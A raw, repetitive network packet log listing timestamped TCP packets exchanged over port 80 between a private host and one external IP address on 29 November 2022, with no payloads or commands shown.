Nov 29, 2022 16:50:19.665193081 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665200949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665225029 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665246964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665256023 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665277004 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665291071 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665307999 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665329933 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665354013 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665365934 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665390015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665422916 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665433884 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665468931 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665472984 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665487051 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665503979 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665518999 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665529013 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665550947 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665565014 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665581942 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665597916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665615082 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665630102 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665649891 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665658951 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665682077 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665693998 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665716887 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665739059 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665760040 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665783882 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665796041 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665803909 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665824890 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665836096 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665855885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665864944 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665889025 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665896893 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665924072 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.666696072 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.674568892 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.674614906 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.674642086 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.674813986 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.693805933 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.693943977 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703025103 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703082085 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703124046 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703136921 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703156948 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703191042 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703219891 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703238964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703248978 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703280926 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703293085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703324080 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703336954 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703365088 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703380108 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703412056 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703423977 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703453064 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703466892 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703499079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703510046 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703536034 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703553915 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703584909 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703613043 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703634024 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703644037 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703675032 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703686953 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703718901 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703732967 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703764915 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703775883 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703803062 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703819990 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703850985 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703866005 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703901052 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703917027 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703947067 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.703962088 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.703994989 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704022884 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704040051 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704047918 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704078913 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704091072 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704125881 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704158068 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704174995 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704188108 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704200983 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704230070 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704265118 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704277992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704308033 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704315901 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704348087 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704361916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704372883 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704401016 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704443932 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704494953 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704509020 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704550982 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704574108 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704617023 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704648018 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704682112 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704713106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704763889 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704807997 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704829931 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704845905 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704888105 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704932928 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.704953909 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.704994917 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.705014944 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.705064058 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.705087900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.705113888 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.705142021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.705153942 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.705180883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.705229044 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.705856085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733555079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733603954 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733630896 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733654976 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733679056 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733705044 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733736992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733756065 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733784914 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733810902 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733835936 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733860016 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733889103 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733903885 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733903885 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733905077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733905077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733905077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733905077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733928919 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.733953953 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733979940 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.733994007 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734011889 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734028101 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734054089 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734065056 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734087944 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734098911 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734124899 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734133959 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734158039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734168053 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734191895 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734200954 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734216928 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734236956 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734260082 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734273911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734289885 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734307051 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734330893 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734339952 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734355927 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734373093 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734400034 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734412909 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734430075 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734448910 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734472990 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734486103 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734502077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734518051 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734543085 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734553099 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734576941 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734586954 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734613895 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734622955 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734646082 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734657049 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734683037 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734692097 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734719992 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734730959 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734752893 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734767914 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734787941 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734800100 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734824896 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734843016 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734858036 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734894991 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734915018 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734936953 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734954119 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.734965086 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.734991074 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.735016108 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.735025883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.735049009 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.735064983 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.739192963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.744177103 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.744362116 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762317896 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762367964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762394905 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762418985 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762448072 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762470961 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762495995 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762506962 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762528896 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762528896 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762561083 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762573004 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762588024 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762598991 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762613058 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762630939 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762644053 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762670040 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762696028 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762706041 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762715101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762732983 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762748957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762773991 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762790918 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762806892 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762818098 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762842894 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762860060 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762893915 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762906075 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762934923 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.762968063 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762981892 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.762995005 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763017893 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763036013 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763057947 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763081074 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763104916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763104916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763104916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763104916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763124943 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763151884 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763178110 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763200045 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763211966 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763227940 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763254881 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763283968 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763310909 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763334036 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763354063 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763370037 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763398886 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763410091 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763438940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763438940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763438940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763438940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763456106 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763470888 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763498068 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763519049 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763535976 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763545990 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763567924 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763586998 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763602972 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763612986 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763670921 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763689041 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763717890 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763746023 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763772964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763792992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763814926 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763838053 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763865948 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.763870955 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763871908 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.763871908 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.764008999 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.764008999 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.764029026 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.771496058 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.771636963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791632891 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791687012 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791714907 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791739941 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791764975 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791821957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791848898 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791877031 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791898012 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791898012 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791920900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791949034 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.791961908 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791985035 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.791997910 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792020082 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792040110 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792056084 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792085886 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792093992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792114019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792124987 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792136908 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792160988 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792172909 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792197943 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792205095 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792234898 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792243004 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792270899 CET	80	49171	208.67.105.179	192.168.2.22
